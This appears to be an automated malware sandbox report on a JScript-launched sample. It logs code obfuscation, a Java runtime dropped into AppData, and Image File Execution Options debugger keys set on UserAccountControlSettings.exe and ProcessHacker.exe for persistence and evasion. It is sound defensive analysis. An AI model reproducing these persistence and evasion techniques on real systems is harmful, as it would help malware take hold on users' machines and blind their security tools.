Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\jre-image\bin\javaws.pdb source: xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmlib_image\mlib_image.pdbMM source: xcopy.exe, 00000012.00000003.1833250324.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\eula\obj\eula.pdb source: xcopy.exe, 00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Binary contains a suspicious time stamp

Source: msvcp140.dll.18.dr

Static PE information: 0xEDEDFA22 [Fri Jun 29 08:17:38 2096 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

1_2_6EEF45FB

JavaScript source code contains large arrays or strings with random content potentially encoding malicious code

Source: gcahfpmhcn.js

String : entropy: 5.54, length: 1028756, content: 'dmFy{2}G5lbTQ0Ow0KdmFy{2}GxvbmdUZX{0}0{2}D0g{2}lVFc0{1}CQlEtPCNDLTwjZ0ktPCNMcGVqbGctPCMtPCMtPCMtPCM

Go to definition

PE file contains sections with non-standard names

Source: unpack200.exe.18.dr

Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_6EEF2E75 push ecx; ret	1_2_6EEF2E88
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_020D8A11 push cs; retf	1_2_020D8A31
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_020DD7EC push es; retn 0001h	1_2_020DD8FF
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_020E2848 push es; retn 0024h	1_2_020E284B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_020DD86F push es; retn 0001h	1_2_020DD8FF
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203D8F7 push 00000000h; mov dword ptr [esp], esp	1_2_0203D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203A20A push ecx; ret	1_2_0203A21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203A21B push ecx; ret	1_2_0203A225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203BB67 push 00000000h; mov dword ptr [esp], esp	1_2_0203BB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203B3B7 push 00000000h; mov dword ptr [esp], esp	1_2_0203B3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203D8E0 push 00000000h; mov dword ptr [esp], esp	1_2_0203D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203B947 push 00000000h; mov dword ptr [esp], esp	1_2_0203B96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203C477 push 00000000h; mov dword ptr [esp], esp	1_2_0203C49D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524A5AC pushad ; iretd	4_3_1524A5AD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524A5AC pushad ; iretd	4_3_1524A5AD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524DE91 push ss; iretd	4_3_1524DE96
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524DE91 push ss; iretd	4_3_1524DE96
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524A5AC pushad ; iretd	4_3_1524A5AD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524A5AC pushad ; iretd	4_3_1524A5AD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524DE91 push ss; iretd	4_3_1524DE96
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524DE91 push ss; iretd	4_3_1524DE96
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_0276BE7B push cs; retf	4_2_0276BEF1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_0276BDDD push ebx; retf	4_2_0276BE7A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_0276BDD8 push ebx; retf	4_2_0276BE7A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_026CD8F7 push 00000000h; mov dword ptr [esp], esp	4_2_026CD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_026CA20A push ecx; ret	4_2_026CA21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_026CA21B push ecx; ret	4_2_026CA225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_026CBB67 push 00000000h; mov dword ptr [esp], esp	4_2_026CBB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_026CB3B7 push 00000000h; mov dword ptr [esp], esp	4_2_026CB3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_026CD8E0 push 00000000h; mov dword ptr [esp], esp	4_2_026CD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_026CB947 push 00000000h; mov dword ptr [esp], esp	4_2_026CB96D

Drops PE files

Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	File created: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\ucrtbase.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\SysWOW64\xcopy.exe

File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl

Jump to dropped file

Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

Boot Survival

Creates a Image File Execution Options (IFEO) Debugger entry

Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe

Creates an undocumented autostart registry key

Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
